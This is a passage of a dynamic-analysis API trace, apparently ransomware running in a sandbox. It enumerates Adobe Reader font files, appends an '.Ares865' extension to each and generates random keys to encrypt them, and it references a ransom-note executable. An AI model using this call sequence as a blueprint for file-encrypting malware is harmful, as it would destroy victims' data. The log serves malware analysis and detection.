lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0160.608] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f556b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x546278e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x546278e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0160.608] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0160.608] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0160.608] lstrcpyW (in: lpString1=0x2cce46e, lpString2="AdobeArabic-Bold.otf" | out: lpString1="AdobeArabic-Bold.otf") returned="AdobeArabic-Bold.otf" [0160.609] lstrlenW (lpString="AdobeArabic-Bold.otf") returned 20 [0160.609] lstrlenW (lpString="Ares865") returned 7 [0160.609] lstrcmpiW (lpString1="old.otf", lpString2="Ares865") returned 1 [0160.609] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Bold.otf.Ares865") returned 83 [0160.609] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-bold.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-bold.otf.ares865"), dwFlags=0x1) returned 1 [0160.611] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-bold.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.612] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=228988) returned 1 [0160.612] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.613] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.613] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.630] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.631] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.631] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.635] lstrcpyW (in: lpString1=0x2cce46e, lpString2="AdobeArabic-BoldItalic.otf" | out: lpString1="AdobeArabic-BoldItalic.otf") returned="AdobeArabic-BoldItalic.otf" [0160.635] lstrlenW (lpString="AdobeArabic-BoldItalic.otf") returned 26 [0160.635] lstrlenW (lpString="Ares865") returned 7 [0160.635] lstrcmpiW (lpString1="lic.otf", lpString2="Ares865") returned 1 [0160.635] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-BoldItalic.otf.Ares865") returned 89 [0160.635] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-BoldItalic.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-bolditalic.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-BoldItalic.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-bolditalic.otf.ares865"), dwFlags=0x1) returned 1 [0160.637] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-BoldItalic.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-bolditalic.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.637] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=252320) returned 1 [0160.637] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.638] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.638] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.655] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.656] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.656] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.660] lstrcpyW (in: lpString1=0x2cce46e, lpString2="AdobeArabic-Italic.otf" | out: lpString1="AdobeArabic-Italic.otf") returned="AdobeArabic-Italic.otf" [0160.660] lstrlenW (lpString="AdobeArabic-Italic.otf") returned 22 [0160.660] lstrlenW (lpString="Ares865") returned 7 [0160.660] lstrcmpiW (lpString1="lic.otf", lpString2="Ares865") returned 1 [0160.660] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Italic.otf.Ares865") returned 85 [0160.660] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Italic.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-italic.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Italic.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-italic.otf.ares865"), dwFlags=0x1) returned 1 [0160.662] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Italic.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-italic.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.662] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=253152) returned 1 [0160.663] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.663] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.663] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.679] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.680] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.680] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.684] lstrcpyW (in: lpString1=0x2cce46e, lpString2="AdobeArabic-Regular.otf" | out: lpString1="AdobeArabic-Regular.otf") returned="AdobeArabic-Regular.otf" [0160.684] lstrlenW (lpString="AdobeArabic-Regular.otf") returned 23 [0160.684] lstrlenW (lpString="Ares865") returned 7 [0160.684] lstrcmpiW (lpString1="lar.otf", lpString2="Ares865") returned 1 [0160.684] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Regular.otf.Ares865") returned 86 [0160.684] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-regular.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Regular.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-regular.otf.ares865"), dwFlags=0x1) returned 1 [0160.689] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeArabic-Regular.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobearabic-regular.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.689] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=228404) returned 1 [0160.690] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.690] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.691] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.716] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.717] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.717] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.720] lstrcpyW (in: lpString1=0x2cce46e, lpString2="AdobeHebrew-Bold.otf" | out: lpString1="AdobeHebrew-Bold.otf") returned="AdobeHebrew-Bold.otf" [0160.720] lstrlenW (lpString="AdobeHebrew-Bold.otf") returned 20 [0160.720] lstrlenW (lpString="Ares865") returned 7 [0160.720] lstrcmpiW (lpString1="old.otf", lpString2="Ares865") returned 1 [0160.720] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Bold.otf.Ares865") returned 83 [0160.721] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-bold.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-bold.otf.ares865"), dwFlags=0x1) returned 1 [0160.723] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-bold.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.723] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=69196) returned 1 [0160.724] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.724] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.724] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.731] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.732] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.732] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.733] lstrcpyW (in: lpString1=0x2cce46e, lpString2="AdobeHebrew-BoldItalic.otf" | out: lpString1="AdobeHebrew-BoldItalic.otf") returned="AdobeHebrew-BoldItalic.otf" [0160.733] lstrlenW (lpString="AdobeHebrew-BoldItalic.otf") returned 26 [0160.733] lstrlenW (lpString="Ares865") returned 7 [0160.733] lstrcmpiW (lpString1="lic.otf", lpString2="Ares865") returned 1 [0160.734] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-BoldItalic.otf.Ares865") returned 89 [0160.734] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-BoldItalic.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-bolditalic.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-BoldItalic.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-bolditalic.otf.ares865"), dwFlags=0x1) returned 1 [0160.736] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-BoldItalic.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-bolditalic.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.736] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=72400) returned 1 [0160.737] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.737] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.737] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.744] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.745] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.745] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.747] lstrcpyW (in: lpString1=0x2cce46e, lpString2="AdobeHebrew-Italic.otf" | out: lpString1="AdobeHebrew-Italic.otf") returned="AdobeHebrew-Italic.otf" [0160.747] lstrlenW (lpString="AdobeHebrew-Italic.otf") returned 22 [0160.747] lstrlenW (lpString="Ares865") returned 7 [0160.747] lstrcmpiW (lpString1="lic.otf", lpString2="Ares865") returned 1 [0160.747] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Italic.otf.Ares865") returned 85 [0160.747] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Italic.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-italic.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Italic.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-italic.otf.ares865"), dwFlags=0x1) returned 1 [0160.749] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Italic.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-italic.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.749] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=72300) returned 1 [0160.749] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.750] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.750] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.759] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.759] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.759] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.761] lstrcpyW (in: lpString1=0x2cce46e, lpString2="AdobeHebrew-Regular.otf" | out: lpString1="AdobeHebrew-Regular.otf") returned="AdobeHebrew-Regular.otf" [0160.761] lstrlenW (lpString="AdobeHebrew-Regular.otf") returned 23 [0160.761] lstrlenW (lpString="Ares865") returned 7 [0160.761] lstrcmpiW (lpString1="lar.otf", lpString2="Ares865") returned 1 [0160.761] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Regular.otf.Ares865") returned 86 [0160.761] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-regular.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Regular.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-regular.otf.ares865"), dwFlags=0x1) returned 1 [0160.763] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Regular.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-regular.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.763] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=70528) returned 1 [0160.763] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.764] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.764] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.769] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.770] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.770] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.771] lstrcpyW (in: lpString1=0x2cce46e, lpString2="AdobePiStd.otf" | out: lpString1="AdobePiStd.otf") returned="AdobePiStd.otf" [0160.771] lstrlenW (lpString="AdobePiStd.otf") returned 14 [0160.771] lstrlenW (lpString="Ares865") returned 7 [0160.771] lstrcmpiW (lpString1="Std.otf", lpString2="Ares865") returned 1 [0160.772] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobePiStd.otf.Ares865") returned 77 [0160.772] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobePiStd.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobepistd.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobePiStd.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobepistd.otf.ares865"), dwFlags=0x1) returned 1 [0160.774] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobePiStd.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobepistd.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.774] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89660) returned 1 [0160.774] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.775] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.775] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.782] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.783] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.783] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.785] lstrcpyW (in: lpString1=0x2cce46e, lpString2="AdobeThai-Bold.otf" | out: lpString1="AdobeThai-Bold.otf") returned="AdobeThai-Bold.otf" [0160.785] lstrlenW (lpString="AdobeThai-Bold.otf") returned 18 [0160.785] lstrlenW (lpString="Ares865") returned 7 [0160.785] lstrcmpiW (lpString1="old.otf", lpString2="Ares865") returned 1 [0160.785] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Bold.otf.Ares865") returned 81 [0160.785] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-bold.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-bold.otf.ares865"), dwFlags=0x1) returned 1 [0160.787] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-Bold.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-bold.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.787] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67160) returned 1 [0160.787] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.788] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.788] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.793] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.793] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.794] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.795] lstrcpyW (in: lpString1=0x2cce46e, lpString2="AdobeThai-BoldItalic.otf" | out: lpString1="AdobeThai-BoldItalic.otf") returned="AdobeThai-BoldItalic.otf" [0160.795] lstrlenW (lpString="AdobeThai-BoldItalic.otf") returned 24 [0160.795] lstrlenW (lpString="Ares865") returned 7 [0160.795] lstrcmpiW (lpString1="lic.otf", lpString2="Ares865") returned 1 [0160.795] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-BoldItalic.otf.Ares865") returned 87 [0160.795] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-BoldItalic.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-bolditalic.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-BoldItalic.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-bolditalic.otf.ares865"), dwFlags=0x1) returned 1 [0160.797] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeThai-BoldItalic.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobethai-bolditalic.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.797] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=70308) returned 1 [0160.797] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.798] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.798] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.803] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.804] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.804] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.806] lstrcpyW (in: lpString1=0x2cce46e, lpString2="AdobeThai-Italic.otf" | out: lpString1="AdobeThai-Italic.otf") returned="AdobeThai-Italic.otf" [0160.806] lstrlenW (lpString="AdobeThai-Italic.otf") returned 20 [0160.806] lstrlenW (lpString="Ares865") returned 7 [0160.806] lstrcmpiW (lpString1="lic.otf", lpString2="Ares865") returned 1 [0160.806] wsprintfW (in: 